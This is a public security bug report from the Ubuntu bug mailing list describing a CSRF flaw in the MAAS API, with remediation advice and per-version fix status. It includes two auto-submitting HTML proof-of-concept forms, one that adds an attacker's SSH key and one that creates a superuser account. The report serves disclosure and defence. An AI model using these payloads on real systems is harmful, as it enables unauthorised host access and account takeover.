*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Seth Arnold (seth-arnold):
Because of the flexibility of the API, various actions could be performed as
part of a CSRF attack. For
example, by enticing a logged in user to visit a page containing the following
HTML, a remote attacker
could trick the user into adding an SSH key.
<html>
<body>
<form
action="https://maas-server-address/MAAS/api/1.0/account/prefs/sshkeys/";
method="POST" name="netcraftForm">
<input type="hidden" name="op" value="new" />
<input type="hidden" name="key" value="ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAol9Jq3adiM0jp5MdD3lwMbtQ2jaPiHJstCYcG71Tl94PoXAQHMG7
eJygNMH2y2TofnqCLnEU57zfK2BG3oTtraKjyvNqnh3eKMNI73O+L73LKmWfvF77mgMkjzxYOKOlOgNe
V5Bx94yi0jfMNir8GRid4/o07RdjZ8eqBjDcglat/fzuumKKoXB5fPbaogYsQT/4n1x6E7KexS+GD0y2
xc3SkKOaWV/HpbaepyezV9ObLATKjmW4pnOl6XHyRxy7Ds6IAuizw4DaIxgbYC8Ep+w0eNs6CerV4DxI
kswXNwi8Z8qK9mYlDjdamsXr1GKHH8zbHH4w1hHLFL8FTe4c9Q== [email protected]" />
<input type="submit" />
</form>
<script>
document.netcraftForm.submit();
</script>
</body>
</html>
This could potentially give the attacker SSH access to hosts. Other simple
attacks could include adding
oauth keys, uploading and deleting files, or setting configuration values – for
example, changing the
HTTP proxy used by nodes or uploading custom commissioning scripts.
In MAAS version 1.5, more API actions have been implemented, and as a result
several extra attacks
are possible. For example, new user accounts can be created via HTML such as:
<html>
<body>
<form action="http://maas-server-address/MAAS/api/1.0/users/"; method="POST"
name=”netcraftForm”>
<input name="username" value="test" type="hidden">
<input name="email" value="[email protected]" type="hidden">
<input name="password" value="test" type="hidden">
<input name="is_superuser" value="1" type="hidden">
<input type="submit">
</form>
<script>
document.netcraftForm.submit();
</script>
</body>
</html>
= Remediation =
Most of the MAAS application is protected against cross-site request forgery
attacks using Django’s
built in anti-CSRF middleware. This validates requests by ensuring that a
cryptographic nonce which is
included in a cookie also appears in HTTP requests which result in
configuration changes. Netcraft
recommends that, if possible, when API requests are authenticated using Djano’s
sessionid cookie,
the framework’s CSRF protection is also used.
** Affects: maas
Importance: Critical
Assignee: Blake Rouse (blake-rouse)
Status: Fix Released
** Affects: maas/1.5
Importance: Undecided
Status: Won't Fix
** Affects: maas/1.7
Importance: Undecided
Status: Won't Fix
** Affects: maas/1.9
Importance: Critical
Assignee: Blake Rouse (blake-rouse)
Status: Fix Released
** Affects: maas/trunk
Importance: Critical
Assignee: Blake Rouse (blake-rouse)
Status: Fix Released
** Tags: netcraft
--
MAAS API vulnerable to CSRF attack
https://bugs.launchpad.net/bugs/1298772
You received this bug notification because you are a member of Ubuntu Bugs,
which is subscribed to the bug report.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
